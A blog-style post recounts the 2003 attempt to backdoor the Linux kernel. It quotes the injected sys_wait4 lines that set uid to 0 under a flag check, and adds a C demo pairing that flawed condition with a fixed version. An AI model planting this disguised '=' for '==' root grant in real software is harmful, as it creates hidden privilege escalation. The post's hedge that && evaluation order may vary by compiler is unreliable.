I love a good hacker story; real ones that is.
I recently came across a story of an attempt to inject code into the Linux kernel that would give any local user root access on demand. I probably came across the news at the time of the discovery, but was then too uneducated to understand it.
Still, now I find it's a very interesting story and highlights just how easy it is to mislead people.
Back in Nov 2003 somebody noticed that a CVS tree used in Linux development had been directly modified. At first it looked like a careless user, or somebody who wasn't following the proper procedure.
However, follow the mailing list replies linked above and you'll see what the direct modification changed. The code appeared in the file exit.c within the sys_wait4 function, part of the scheduling/queuing system in Linux.
Code:
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+         retval = -EINVAL;
The second line of code is pointless, but the one before it is potentially very problematic. The first half of the if statement checks for two flags. With the gcc compiler, this half of the if will be evaluated first (I do believe it's not a strict rule in C, however, and some compilers may do it differently?). Only if it's true will the second half (after the &&) be evaluated too.
First up, the two flags would never logically be set simultaneously (so I've read in the mailing list and other articles on this matter), but somebody could deliberately pass both, thus making the second half of the if statement evaluate.
The only problem is that the second half of the statement isn't a comparison, it's an assignment. "current->uid = 0" doesn't check the user id, it sets it. Bang, a bit of root access for you, right there. == and =, there's a big difference.
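To make the two points above concrete (the && only reaches the second operand when the flag check passes, and that second operand assigns rather than compares), here is an added example that is not code from the original post or from the kernel. It uses a constructed stand-in struct and made-up flag values, not the real __WCLONE/__WALL constants, and reproduces the injected condition next to a form where the same typo cannot compile.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-in for the kernel's task struct; only uid matters here. */
struct task {
    unsigned int uid;
};

/* Constructed placeholder flag values, NOT the real __WCLONE / __WALL. */
#define WCLONE_FLAG 0x80000000u
#define WALL_FLAG   0x40000000u

/* The injected condition as it appeared: '=' where '==' was meant.
 * The && short-circuits, so the assignment only runs when both flags are
 * set. When it does run, it stores 0 into uid and evaluates to 0 (false),
 * so retval is never set and the caller sees no error at all. */
int backdoored_check(unsigned int options, struct task *tsk)
{
    int retval = 0;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (tsk->uid = 0)) /* assignment */
        retval = -EINVAL;
    return retval;
}

/* What a genuine "root may not use this flag combination" check looks like.
 * The constant is placed on the left: writing '0 = tsk->uid' by mistake is a
 * compile error instead of a silent privilege change. */
int fixed_check(unsigned int options, const struct task *tsk)
{
    int retval = 0;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (0 == tsk->uid))
        retval = -EINVAL;
    return retval;
}

int main(void)
{
    struct task t = { 1000 };

    /* Normal flags: short-circuit means uid is untouched. */
    backdoored_check(0, &t);
    printf("normal call: uid=%u\n", t.uid);

    /* Both flags: uid silently becomes 0 and no error is returned. */
    int r = backdoored_check(WCLONE_FLAG | WALL_FLAG, &t);
    printf("both flags: retval=%d uid=%u\n", r, t.uid);

    struct task u = { 1000 };
    r = fixed_check(WCLONE_FLAG | WALL_FLAG, &u);
    printf("fixed check: retval=%d uid=%u\n", r, u.uid);
    return 0;
}
```

Compile it with warnings on (`gcc -Wall`) and note whether your compiler flags the assignment; a warning is only advisory, which is why the left-hand-constant style in `fixed_check` is worth adopting for checks that gate privilege.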
Luckily the direct modification was noticed, and the intent of the injected code very quickly discovered, but had the edit not been noticed, how long would it have been before it was found?
Hopefully some of you find stuff like this interesting too. Half of my degree is Computer Science, so I find it interesting by default I guess. Still, thought it was worth sharing.